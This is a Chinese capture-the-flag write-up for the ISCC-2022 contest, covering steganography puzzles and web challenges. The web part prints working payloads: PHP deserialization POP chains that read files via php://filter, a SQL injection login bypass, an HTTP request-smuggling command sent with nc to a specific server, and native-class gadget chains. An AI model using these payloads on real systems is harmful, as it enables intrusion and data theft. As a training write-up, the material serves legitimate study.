ISCC-2022
本文首发于奇安信攻防社区
注:本文所做题目时间和复现时间不一致,按照主办方每天中午更新flag,或许有不同
练武
MISC
单板小将苏翊鸣
下载附件得到压缩包和图片
修改高度
扫码得到
所以密码为15942
得到
ISCC{beij-dbxj-2004}
降维打击
foremost分离
zsteg对00000567进行分析,发现在b1,r,lsb,yx通道存在一张png
分离得到
魔女文字对照得到flag
ISCC{RARC-ZQTX-EDKM}
藏在星空中的诗-1
psd图片用ps打开,不透明度设为100%
由图片可得顺序
1 3 5 2 4
然后
密码就是这些星星(个人没学过MISC,真心感觉有点脑残,仅个人观点(狗头)
RNM有的星星Ctrl+F都找不到
ISCC{CLUOLCDYZAWTFV}
真相只有一个
将png进行处理
zsteg -a entity.png
在b1,rgb,lsb,xy通道得到一个文本
提取一下
zsteg -E b1,rgb,lsb,xy entity.png > out2.png
对压缩包进行掩码爆破
解压后流量分析(stream+.zip里面的pcapng
发现password.mp3
并分离出来
得到
.. ... -.-. -.-. -- .. ... -.-.
得到
猜测是nsow隐写
ISCC{4Pbq-e9h2-r8AM}
隐秘的信息
十六进制转二进制
把空格消除
#s tr1 = len('01100110011001000011001000110101001101000110010000110000011001000011000001100100011001010110010001100001001101010011000000111001011001000011010100111001001100000110010001100100001101010011000001100100011001000011010000111001001101100011000100110000011001000011001100110101001100100011100101100101001101010011100100110101001101010011000001100101001100010110010000111001011001000011000100110100001110010110001100110101011001100011011101100110011000110011000000110001011001100011100000110000001100000011011101100110')
str1 = '01100110 01100100 00110010 00110101 00110100 01100100 00110000 0110010000110000 01100100 01100101 01100100 01100001 00110101 00110000 0011100101100100 00110101 00111001 00110000 01100100 01100100 00110101 0011000001100100 01100100 00110100 00111001 00110110 00110001 00110000 0110010000110011 00110101 00110010 00111001 01100101 00110101 00111001 0011010100110101 00110000 01100101 00110001 01100100 00111001 01100100 0011000100110100 00111001 01100011 00110101 01100110 00110111 01100110 0110001100110000 00110001 01100110 00111000 00110000 00110000 00110111 01100110'.replace(' ','')
print str1
01100110011001000011001000110101001101000110010000110000011001000011000001100100011001010110010001100001001101010011000000111001011001000011010100111001001100000110010001100100001101010011000001100100011001000011010000111001001101100011000100110000011001000011001100110101001100100011100101100101001101010011100100110101001101010011000001100101001100010110010000111001011001000011000100110100001110010110001100110101011001100011011101100110011000110011000000110001011001100011100000110000001100000011011101100110
ASCII码的二进制表达,是从 0000 0000 开始,到 0111 1111 结束
得到
ISCC{iBud7T7RXCMJyeT8vtRq}
WEB
冬奥会
<?php
show_source(__FILE__);
$Step1=False;
$Step2=False;
$info=(array)json_decode(@$_GET['Information']);
if(is_array($info)){
var_dump($info);
is_numeric(@$info["year"])?die("Sorry~"):NULL;
if(@$info["year"]){
($info["year"]=2022)?$Step1=True:NULL;
}
if(is_array(@$info["items"])){
if(!is_array($info["items"][1])OR count($info["items"])!==3 ) die("Sorry~");
$status = array_search("skiing", $info["items"]);
$status===false?die("Sorry~"):NULL;
foreach($info["items"] as $key=>$val){
$val==="skiing"?die("Sorry~"):NULL;
}
$Step2=True;
}
}
if($Step1 && $Step2){
include "2022flag.php";echo $flag;
}
当Step1和Step2都为True就输出flag
1、弱比较
2、数组长度为3,且第二个为数组,弱比较,遍历整个数组,其中skiing是强等于,所以只要数组中除了第二个有0即可
payload:
Information={"year":"2022a","items":[1,[2],0]}
Information={"year":"2022a","items":[0,[2],1]}
ISCC{W31com3_T0_Beijin9}
Pop2022
源码:
Happy New Year~ MAKE A WISH
<?php
echo 'Happy New Year~ MAKE A WISH
';
if(isset($_GET['wish'])){
@unserialize($_GET['wish']);
}
else{
$a=new Road_is_Long;
highlight_file(__FILE__);
}
/***************************pop your 2022*****************************/
class Road_is_Long{
public $page;
public $string;
public function __construct($file='index.php'){
$this->page = $file;
}
public function __toString(){
return $this->string->page;
}
public function __wakeup(){
if(preg_match("/file|ftp|http|https|gopher|dict|../i", $this->page)) {
echo "You can Not Enter 2022";
$this->page = "index.php";
}
}
}
class Try_Work_Hard{
protected $var;
public function append($value){
include($value);
}
public function __invoke(){
$this->append($this->var);
}
}
class Make_a_Change{
public $effort;
public function __construct(){
$this->effort = array();
}
public function __get($key){
$function = $this->effort;
return $function();
}
}
/**********************Try to See flag.php*****************************/
非常简单的构造,就不叙述过程了
exp:
<?php
class Road_is_Long{
public $page;
public $string;
function __construct($file='ki10Moc'){
$this->page = $file;
}
}
class Try_Work_Hard{
protected $var='php://filter/read=convert.base64-encode/resource=flag.php';
}
class Make_a_Change{
public $effort;
}
$a = new Road_is_Long();
$a->string = new Make_a_Change();
$a->string->effort = new Try_Work_Hard();
$b = new Road_is_Long($a);
echo urlencode(serialize($b));
解码即可:
ISCC{P0p_Zi_aNd_P1p_Mei_Da1ly_life_2022}
Easy-SQL
?id=8 //出现回显,猜测可能是Mysql8
?id=8 union table emails limit 8,1 --+
访问压缩包下载
得到源码:
<?php
include "./config.php";
// error_reporting(0);
// highlight_file(__FILE__);
$conn = mysqli_connect($hostname, $username, $password, $database);
if ($conn->connect_errno) {
die("Connection failed: " . $conn->connect_errno);
}
echo "Where is the database?"."
";
echo "try ?id";
function sqlWaf($s)
{
$filter = '/xml|extractvalue|regexp|copy|read|file|select|between|from|where|create|grand|dir|insert|link|substr|mid|server|drop|=|>|<|;|"|^||| |'/i';
if (preg_match($filter,$s))
return False;
return True;
}
if (isset($_GET['id']))
{
$id = $_GET['id'];
$sql = "select * from users where id=$id";
$safe = preg_match('/select/is', $id);
if($safe!==0)
die("No select!");
$result = mysqli_query($conn, $sql);
if ($result)
{
$row = mysqli_fetch_array($result);
echo ""
. $row['username'] . "
";
echo ""
. $row['passwd'] . "";
}
else
die('
Error!');
}
if (isset($_POST['username']) && isset($_POST['passwd']))
{
$username = strval($_POST['username']);
$passwd = strval($_POST['passwd']);
if ( !sqlWaf($passwd) )
die('damn hacker');
$sql = "SELECT * FROM users WHERE username='${username}' AND passwd= '${passwd}'";
$result = $conn->query($sql);
if ($result->num_rows > 0) {
$row = $result->fetch_assoc();
if ( $row['username'] === 'admin' && $row['passwd'] )
{
if ($row['passwd'] == $passwd)
{
die($flag);
} else {
die("username or passwd wrong, are you admin?");
}
} else {
die("wrong user");
}
} else {
die("user not exist or wrong passwd");
}
}
mysqli_close($conn);
?>
这里之前可以判断一共是3列
三列内容:id,username,password
满足username=admin并且password=password
username=-1' union values row("admin","admin","ki10Moc")#&passwd=ki10Moc
ISCC{Fdsfs219_19FdFasVEsd0f158_T0o_SFFsd12156fs_m1}
让我康康!
发现提示Try flag
但是无查询结果
发现服务器是gunicorn20.0.0
想到请求走私
gunicorn 20.0.4 请求走私漏洞简析(含复现环境&Poc)-Linux实验室 (linuxlz.com)
直接打
echo -en "GET / HTTP/1.1rnHost: 127.0.0.1rnContent-Length: 123rnSec-Websocket-Key1: xrnrnxxxxxxxxGET /fl4g HTTP/1.1rnHost: 127.0.0.1/fl4grnX-Forwarded-For: 127.0.0.1rnsecr3t_ip: 127.0.0.1rnContent-Length: 35rnrnGET / HTTP/1.1rnHost: localhostrnrn" | nc 59.110.159.206 7020
ISCC{AWEIweiwwwweeeiii_JJj9JJGg5GGG_NONONONO2022}
findme
浅析PHP原生类 - 安全客,安全资讯平台 (anquanke.com)
<?php
highlight_file(__FILE__);
class a{
public $un0;
public $un1;
public $un2;
public $un3;
public $un4;
public function __destruct(){
if(!empty($this->un0) && empty($this->un2)){
$this -> Givemeanew();
if($this -> un3 === 'unserialize'){
$this -> yigei();
}
else{
$this -> giao();
}
}
}
public function Givemeanew(){
$this -> un4 = new $this->un0($this -> un1);
}
public function yigei(){
echo 'Your output: '.$this->un4;
}
public function giao(){
@eval($this->un2);
}
public function __wakeup(){
include $this -> un2.'hint.php';
}
}
$data = $_POST['data'];
unserialize($data);
其中我在文章这里提到的一个小trick
再来看看源码,此处可以实现原生类的自声明和调用
$this -> un4 = new $this->un0($this -> un1);
__wakeup()中可以查看hint.php,那就先看一下hint.php
当然这是我最开始的写法,挺麻烦的,应该不是出题人的意思
<?php
class a
{
public $un0 = 'SplFileObject';
public $un1 = 'php://filter/read=convert.base64-encode/resource=hint.php';
public $un2;
public $un3 = 'unserialize';
public $un4;
}
echo serialize(new a());
按照出题人的意思应该这么写
<?php
class a
{
public $un0;
public $un1;
public $un2 = 'php://filter/read=convert.base64-encode/resource=';
public $un3;
public $un4;
}
echo serialize(new a());
这样就可以直接读取hint.php,不需要去看前面的if,直接执行的
得到信息
<?php$a = 'flag在当前目录下以字母f开头的txt中,无法爆破出来';
下面就是找这样的文件
可以用**Directorylterator也可以用Filesystemlterator**
当然最好是使用**Globlterator,行为类似glob()**
在网上看到的一些在**Globlterator**下依然使用glob协议去读文件就挺….没必要的
<?php
class a
{
public $un0 = 'GlobIterator';
public $un1 = 'f*.txt';
public $un2;
public $un3 = 'unserialize';
public $un4;
}
echo serialize(new a());
得到
那最后再去读这个文件即可
<?php
class a
{
public $un0